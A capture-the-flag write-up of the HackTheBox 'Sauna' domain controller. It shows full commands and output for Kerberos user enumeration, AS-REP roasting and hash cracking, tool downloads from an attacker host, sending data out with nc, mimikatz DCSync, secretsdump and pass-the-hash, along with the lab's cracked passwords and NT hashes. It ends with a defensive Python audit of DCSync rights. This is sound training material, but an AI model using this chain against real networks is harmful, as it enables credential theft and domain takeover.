Disclaimer
The hosts attacked in this article are legally authorized targets. The tools and methods used in this article are only for learning and communication. Please do not use the tools and ideas in this article for any illegal purpose. I am not responsible for any consequences arising from their use, nor for any misuse or damage caused.
Service detection
Port discovery
┌──(root💀kali)-[~/HTB/Sauna]
└─# nmap -p- -Pn 10.10.10.175 --open
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 EST
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).
Not shown: 65515 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49697/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1192.54 seconds
Port Details
┌──(root💀kali)-[~/HTB/Sauna]
└─# nmap -Pn -sV -A -O -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697 10.10.10.175
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:45 EST
Nmap scan report for 10.10.10.175
Host is up.
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     adws?
| fingerprint-strings:
|   DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns:
|_    Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion
49667/tcp open     msrpc         Microsoft Windows RPC
49673/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open     msrpc         Microsoft Windows RPC
49677/tcp open     msrpc         Microsoft Windows RPC
49686/tcp filtered unknown
49697/tcp open     msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-01-03T22:46:21
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   253.57 ms 10.10.14.1
2   254.12 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.12 seconds
With DNS, Kerberos and LDAP exposed, this is clearly a domain controller.
Domain name enumeration
┌──(root💀kali)-[~/HTB/Sauna]
└─# crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURE
This gives us the domain name: EGOTISTICAL-BANK.LOCAL
I went through a long round of enumeration and couldn't get anything useful: the SMB shares cannot be opened, and no useful user names are known.
Kerberos
Use nmap to enumerate Kerberos user names:
┌──(root💀kali)-[~/HTB/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 07:03 EST
Nmap scan report for 10.10.10.175
Host is up (0.30s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     [email protected]
|     [email protected]
|_    [email protected]

Nmap done: 1 IP address (1 host up) scanned in 41.32 seconds
Only the user name administrator was found, which obviously is of no use to us at present.
The HTTP service on port 80 looks like a company introduction page; try to build a user list from it:
cewl -d 1 -m 3 -w user.txt 10.10.10.175
Enumerate Kerberos user names with the generated list:
┌──(root💀kali)-[~/HTB/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/root/HTB/Sauna/user.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 08:00 EST
Nmap scan report for 10.10.10.175
Host is up.

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|_    sauna@EGOTISTICAL-BANK.LOCAL

Nmap done: 1 IP address (1 host up) scanned in 16.22 seconds
This gives a new user name: sauna
Web
On the About Us page, the team members' names are exposed. Manually create a user name dictionary from them and add the two Kerberos user names found above:
┌──(root💀kali)-[~/HTB/Sauna]
└─# cat user
FergusSmith FergusSmith Coins Shaun Coins Shaun.Coins ShaunCoins Shaun.C scoins Hugo Bear Hugo Bear Hugo.Bear HugoBear Hugo.B hbear Bowie Taylor Bowie Taylor Bowie.Taylor BowieTaylor Bowie.T btaylor Sophie Driver Sophie Driver Sophie.Driver SophieDriver Sophie.D sdriver Steven Kerb Steven Kerb Steven.Kerb StevenKerb Steven.K skerb sauna administrator
Use GetNPUsers.py to request tickets from Kerberos for accounts that do not require pre-authentication (AS-REP roasting).
HackTricks explains:
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
┌──(root💀kali)-[~/HTB/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/HTB/Sauna/user -outputfile hashes.asreproast -dc-ip 10.10.10.175
We get an AS-REP hash for FSmith:
┌──(root💀kali)-[~/HTB/Sauna]
└─# cat hashes.asreproast
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:85853ae8057c9c84f1ae5e3860cfcf35$29c704dfe2ce770414e478fcb530171c1b749dce35187d79c2679d93eaa6d2f5cd068123b2e4bbe3f59a94c1e589aa494ab81aa8d5c5c4d0bfdfa7a77320c3651f69e58550327e188e1b551f4d7d5a85fd0d541793c37e1908197d535f32ac12442756f3d5264610f155bcf1f341b29fa07234aaf7cd10a74c8fea80dddf6a8f5364633faf65313b81401888d24115e8c1bdb6fa2b45cf88b95c7f0b02f64cdf3ac44eb71fca52b9c187fa91bbcc9bd743ea59b8625abb2e8c94e632df4f3e2a8d50ed035e8b796e1ee1d57b1d6d85b4813af2b76c2af16da1ac9b2880f20c2afdac285dc57c200595de6d22df40eba458438d6b3082b3a66bebeeea0e04aacc
Crack it with John
┌──(root💀kali)-[~/HTB/Sauna]
└─# john --wordlist=/usr/share/wordlists/<wordlist>.txt hashes.asreproast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Foothold
We now have a set of credentials: fsmith:Thestrokes23
Log in with evil-winrm to get a foothold and user.txt:
┌──(root💀kali)-[~/HTB/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
Privilege escalation
Transfer winPEAS and nc.exe to the target:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/winPEASx64.exe', 'C:\Users\FSmith\Desktop\winPEASx64.exe')"
Run winPEAS and redirect its output to o.txt:
&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt
Send the file back with nc.exe from PowerShell. On the Kali side, receive:
nc -nlvp 4444 > o.txt
On the target, transmit:
Get-Content o.txt | .\nc.exe -w 3 10.10.16.3 4444 | tee test.log
A user password was found:
Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
List the users on the target:
*Evil-WinRM* PS C:\> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.
Log in as svc_loanmgr with evil-winrm and view the user information:
*Evil-WinRM* PS C:\> net users svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 3:48:31 PM
Password expires             Never
Password changeable          1/25/2020 3:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
svc_loanmgr is a member of the Remote Management Users group (the name is truncated in the net user output).
Look at the description of this group:
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
FSmith
svc_loanmgr
The command completed successfully.
It is a remote access (WinRM) group.
We try to obtain user hashes with a DCSync attack.
Hacktricks explains DCSync as follows:
- The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
- By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
- If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text.
The default groups with permission to perform DCSync are: Domain Admins, Enterprise Admins, Administrators, and Domain Controllers.
Transfer mimikatz.exe from Kali to the target:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/mimikatz.exe', 'C:\Users\svc_loanmgr\Documents\mimikatz.exe')"
Run the following command to trigger DC replication (DCSync):
mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit
The user hashes are exported:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv
[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL'
502     krbtgt          4a8899428cad97676ff802229e466e2c        514
1103    HSmith          58a52d36c84fb7f5f1beab9a201db1dd        66048
1000    SAUNA$          230699e71e07d687981fc0685082b5cc        532480
500     Administrator   823452073d75b9d1cf70ebdf86c7f98e        66048
1105    FSmith          58a52d36c84fb7f5f1beab9a201db1dd        4260352
1108    svc_loanmgr     9cb31797c39a9b170b04058ba2bba48c        66048

mimikatz(commandline) # exit
Bye!
Use evil-winrm to log in directly as Administrator with the NT hash (pass-the-hash):
┌──(root💀kali)-[~/HTB/Sauna]
└─# evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
Conclusion
From the names shown on the web page we guessed user names, then used GetNPUsers.py to request Kerberos tickets for accounts that do not require pre-authentication and cracked the resulting AS-REP hash to get a foothold. With winPEAS we found another user's clear-text credentials (AutoLogon), which gave us svc_loanmgr; that account holds DCSync rights, so DCSync exposed the Administrator's hash and pass-the-hash gave us Administrator.
Supplement
secretsdump.py
secretsdump.py can also dump the other users' password hashes via DCSync once svc_loanmgr's credentials are known:
┌──(root💀kali)-[~/HTB/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc:::
[*] Kerberos keys grabbed
[...]
[*] Cleaning up...
How do I know whether my account has permission to use DCSync?
Download PowerView.ps1 locally.
Log on to the target, passing the PowerSploit Recon directory as the script path:
┌──(root💀kali)-[~/HTB/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -s '/root/PowerSploit/Recon'
Load PowerView.ps1:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1
Check the domain ACL entries for svc_loanmgr and FSmith:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : All
IdentityReference : EGOTISTICALBANK\FSmith
IsInherited : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : All
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags : None
ObjectFlags : None
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : DS-Replication-Get-Changes
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
InheritedObjectType : All
ObjectDN : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType : DS-Replication-Get-Changes-All
IdentityReference : EGOTISTICALBANK\svc_loanmgr
IsInherited : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags : None
ObjectFlags : ObjectAceTypePresent
InheritanceFlags : None
InheritanceType : None
AccessControlType : Allow
ObjectSID : S-1-5-21-2966785786-3096785034-1186376766
Note that the ObjectType field shows svc_loanmgr holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, which means the account can perform DCSync. Refer to this article.
You can also use BloodHound to check the domain permissions of the current account, including whether it has DCSync rights.
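To turn the ACL check above into something a defender can run over saved Get-ObjectAcl output, here is an added example (not PowerView's or this writeup's own code): it parses the blank-line separated records, collects which identities hold DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain root, and reports holders outside the default groups listed earlier. The sample records are constructed to mirror the listing above.

```python
"""Audit who holds DCSync rights, from PowerView Get-ObjectAcl text output.
Added example (not PowerView's or the page's own code); SAMPLE is constructed."""
import re

DCSYNC_RIGHTS = {"DS-Replication-Get-Changes",      # both are needed for
                 "DS-Replication-Get-Changes-All"}  # a full DCSync
EXPECTED_HOLDERS = {"Domain Admins", "Enterprise Admins", "Administrators",
                    "Domain Controllers"}  # default holders, as listed on the page
RECORD_LINE = re.compile(r"^\s*(\w+)\s*:\s*(.*)$")

def parse_acl_records(text):
    """One dict per blank-line separated ACE; stray lines (ruby warnings etc.) are dropped."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {m.group(1): m.group(2).strip()
               for m in map(RECORD_LINE.match, chunk.splitlines()) if m}
        if "IdentityReference" in rec:
            records.append(rec)
    return records

def replication_rights(records):
    """Identity -> Allowed DCSync rights; ObjectType 'All' covers every extended right."""
    rights = {}
    for rec in records:
        if (rec.get("AccessControlType") != "Allow"
                or "ExtendedRight" not in rec.get("ActiveDirectoryRights", "")):
            continue
        obj_type = rec.get("ObjectType", "")
        if obj_type == "All" or obj_type in DCSYNC_RIGHTS:
            grant = DCSYNC_RIGHTS if obj_type == "All" else {obj_type}
            rights.setdefault(rec["IdentityReference"], set()).update(grant)
    return rights

def dcsync_capable(records):
    # Only identities holding BOTH rights can replicate secrets (NT hashes, keys).
    return sorted(i for i, r in replication_rights(records).items() if DCSYNC_RIGHTS <= r)

def unexpected_dcsync(records):
    # DCSync-capable identities outside the default groups: the findings to investigate.
    return [i for i in dcsync_capable(records) if i.split("\\")[-1] not in EXPECTED_HOLDERS]

# Constructed sample modelled on the Get-ObjectAcl listing above.
SAMPLE = """\
ObjectType : All
IdentityReference : EGOTISTICALBANK\\FSmith
ActiveDirectoryRights : ReadProperty, GenericExecute
AccessControlType : Allow

ObjectType : DS-Replication-Get-Changes
IdentityReference : EGOTISTICALBANK\\svc_loanmgr
ActiveDirectoryRights : ExtendedRight
AccessControlType : Allow

ObjectType : DS-Replication-Get-Changes-All
IdentityReference : EGOTISTICALBANK\\svc_loanmgr
ActiveDirectoryRights : ExtendedRight
AccessControlType : Allow

ObjectType : All
IdentityReference : EGOTISTICALBANK\\Domain Admins
ActiveDirectoryRights : ExtendedRight
AccessControlType : Allow
"""
```

Running unexpected_dcsync(parse_acl_records(SAMPLE)) reports only EGOTISTICALBANK\svc_loanmgr: Domain Admins is an expected holder and FSmith's ReadProperty ACE grants nothing relevant.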
About uploading and downloading
I only learned this from watching IppSec's video. After logging in with evil-winrm, you can upload and download files directly with the upload and download commands. Oh, it really is this convenient.